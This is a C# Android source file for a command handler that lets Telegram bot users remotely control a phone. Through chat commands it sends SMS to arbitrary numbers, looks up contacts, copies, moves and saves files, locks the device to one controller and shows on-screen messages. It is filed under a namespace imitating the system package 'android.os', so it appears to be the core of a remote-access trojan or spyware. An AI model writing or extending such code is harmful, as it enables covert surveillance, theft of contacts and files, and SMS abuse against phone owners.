using System;
using System.IO;
using System.IO.Compression;
using Java.Lang;
using Android.Widget;
using Android.App;
using TeleSharp.Entities.SendEntities;
using System.Collections.Generic;
using Android.Telephony;
using Android.Content;
using TeleSharp.Entities;
using android.os.Resources;
using android.os;

namespace android.os
{
    public class CTRL
    {
        public CTRL(Message m, UserInformation user, Document filedown = null, bool isforw = false)
        {
            if (!inf.Values.sharep.GetBoolean("private", false) || m.From.Id.ToString() == inf.Manager.ChatId)
            {
                if (inf.Values.sharep.Contains("lockfor"))
                {
                    if (inf.Values.sharep.GetLong("lockfor", 0) == m.From.Id || m.From.Id.ToString() == inf.Manager.ChatId)
                        CTRLMESS(m, filedown, user);
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device is locked and you can't use of this!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                }
                else
                    CTRLMESS(m, filedown, user);
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this device is private and just manager can use this device or change this to public device!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
        }
        public void CTRLMESS(Message m, Document fdown, UserInformation user)
        {
            if (m.ForwardFrom != null)
                CheckForward(m, user);
            else
                checkemessageforcallbacks(m, user,fdown);
        }

        private void CheckForward(Message m, UserInformation user)
        {
            try
            {
                if (user.OnAddChatId)
                {
                    if (!inf.UserExist(m.ForwardFrom.Id.ToString(), inf.MyUsers))
                    {
                        UserInformation u = new UserInformation(m.ForwardFrom.Id.ToString())
                        {
                            Name = m.ForwardFrom.FirstName,
                            UserName = m.ForwardFrom.Username
                        };
                        u.SaveSetting(UsersMode.MyUsers);
                        inf.MyUsers.Add(u);
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!,Chat id: " + m.ForwardFrom.Id + " was added!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "User: " + m.From.FirstName + " Added You To This Bot", ChatId = m.ForwardFrom.Id.ToString() });
                    }
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this chat id was added and not needed add again!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                }
                else if (user.OnForwLock)
                {
                    inf.Values.sharep.Edit().PutLong("lockfor", m.ForwardFrom.Id).Commit();
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!,Locked For: " + m.ForwardFrom.Username, ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                }
                else if (user.OnRemoveChatId)
                {
                    if (inf.UserExist(m.ForwardFrom.Id.ToString(), inf.MyUsers))
                        DoWork.DeleteChatId(m.ForwardFrom.Id.ToString(), m.MessageId, m.From.Id.ToString(), UsersMode.Users);
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "this chat id was not found and not needed delete!", ChatId = m.From.Id.ToString() });
                }
                user.OnAddChatId = user.OnForwLock = user.OnRemoveChatId = false;
            }
            catch { }
        }
        private void checkemessageforcallbacks(Message m, UserInformation user,Document fdown)
        {
            if (m.Text == "Start")
                inf.CTRLApi.SendMessage(PARAMSEND.List(m.From.Id.ToString()));
            else if(m.Text=="Stop")
            {
                if (m.From.Id.ToString() == inf.MyManagerId || m.From.Id.ToString() == inf.Manager.ChatId)
                {
                    inf.CTRLApi.SendSimpleTextMessage(m.From.Id.ToString(), "This bot has been stoped, now you can restart bot from main bot");
                    inf.Values.sharep.Edit().PutBoolean("stopbot", true).Commit();
                    inf.CTRLApi.StopUpdates();
                    inf.CTRLApi = null;
                }
                else
                    inf.Values.api.SendSimpleTextMessage(m.From.Id.ToString(), "Only Manager Can");
            }
            else
                try
                {
                    if (user.onimportant)
                    {
                        inf.Values.sharep.Edit().PutString("importantnumber", m.Text).Commit();
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! important mode for one important sms has been enabled!", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                    }
                    else if (user.OnRenameFile)
                    {
                        Filef.rename(user.FilePth, m.Text);
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!File Renamed To: " + m.Text, ChatId = m.From.Id.ToString() });
                    }
                    else if (user.OnChangeDeviceName)
                    {
                        inf.Values.sharep.Edit().PutString("devname" + m.From.Id, m.Text.ToLower()).Commit();
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!device name changed to: " + m.Text, ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                    }
                    else if (user.OnWritePathToSaveFile)
                    {
                        DoWork.DownloadFile("/" + m.Text, m.From.Id.ToString(), user.FileToDownload);
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!file saved as: " + m.Text, ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                        user.FileToDownload = null;
                    }
                    else if (user.OnCopy)
                        DoWork.CopyFile(user.FilePth + ",/" + m.Text, m.From.Id.ToString());
                    else if (user.OnCut)
                        DoWork.CutFile(user.FilePth + ",/" + m.Text, m.From.Id.ToString());
                    else if (user.OnRemoveChatId)
                        DoWork.DeleteChatId(m.Text, m.MessageId, m.From.Id.ToString(), UsersMode.MyUsers);
                    else if (user.OnShowMessage)
                    {
                        if (inf.Values.C != null)
                        {
                            Intent i = new Intent(inf.Values.C, typeof(toastrec));
                            i.PutExtra("text", m.Text);
                            inf.Values.C.SendBroadcast(i);
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!message was shown!", ChatId = m.From.Id.ToString() });
                        }
                        else
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Can't Show Message!", ChatId = m.From.Id.ToString() });
                    }
                    else if (user.OnSetMaxSize)
                    {
                        if (inf.isdigit(m.Text))
                            inf.Values.sharep.Edit().PutLong("maxsize", Convert.ToInt64(m.Text) * 1048576).Commit();
                        else
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "value incorrect", ChatId = m.From.Id.ToString(), ReplyToMessageId = m.MessageId });
                    }
                    else if (user.OnSendSms)
                    {
                        string phonenumber = Filef.fpart(m.Text);
                        string textmess = Filef.spart(m.Text);
                        SmsManager.Default.SendTextMessage(phonenumber, null, textmess, null, null);
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!message was sent!", ChatId = m.From.Id.ToString() });
                    }
                    else if (user.OnExtract)
                    {
                        if (Directory.Exists("/" + m.Text))
                            DoWork.extract(m.From.Id.ToString(), user.FilePth, "/" + m.Text);
                        else
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "not found: " + m.Text, ChatId = m.From.Id.ToString() });
                    }
                    else if (user.OnSearchNum)
                    {
                        string num = Contacts.number_to_name(m.Text);
                        if (num == "")
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Not Found Number Of \"" + m.Text + "\"", ChatId = m.From.Id.ToString() });
                        else
                        {
                            num = ("Name=" + num + "\nNumber=" + m.Text);
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = num, ChatId = m.From.Id.ToString() });
                        }
                    }
                    else if (user.OnSearchName)
                    {
                        List<string> contnums = Contacts.name_to_numbers(m.Text);
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Contacts Lenght: " + contnums.Count, ChatId = m.From.Id.ToString() });
                        for (int i = 0; i < contnums.Count; i++)
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = ("Name=" + m.Text + "\nNumber=" + contnums[i]), ChatId = m.From.Id.ToString() });
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Completed!", ChatId = m.From.Id.ToString() });
                    }
                    else
                        SendStartKeys(m.From.Id.ToString());
                    user.SetNull();
                }
                catch (System.Exception ex)
                {
                    user.SetNull();
                    throw new System.Exception(ex.Message + "\n\nusername= " + "\nusername= " + m.From.FirstName + m.From.Username + "\nchatid=" + m.From.Id + "\nuser sent text=" + m.Text);
                }
        }

        private void SendStartKeys(string id)
        {
            inf.CTRLApi.SendMessage(new SendMessageParams
            {
                ChatId = id,
                Text = "for show and use of options,plz click 'Start' button",
                CustomKeyboard = new ReplyKeyboardMarkup
                {
                    ResizeKeyboard = true,
                    Keyboard = new List<List<KeyboardButton>>
                        {
                            new List<KeyboardButton>
                            {
                                new KeyboardButton {Text="Start",RequestContact=false,RequestLocation=false },
                                new KeyboardButton {Text="Stop",RequestContact=false,RequestLocation=false }
                            }
                        }
                }
            });
        }
    }
}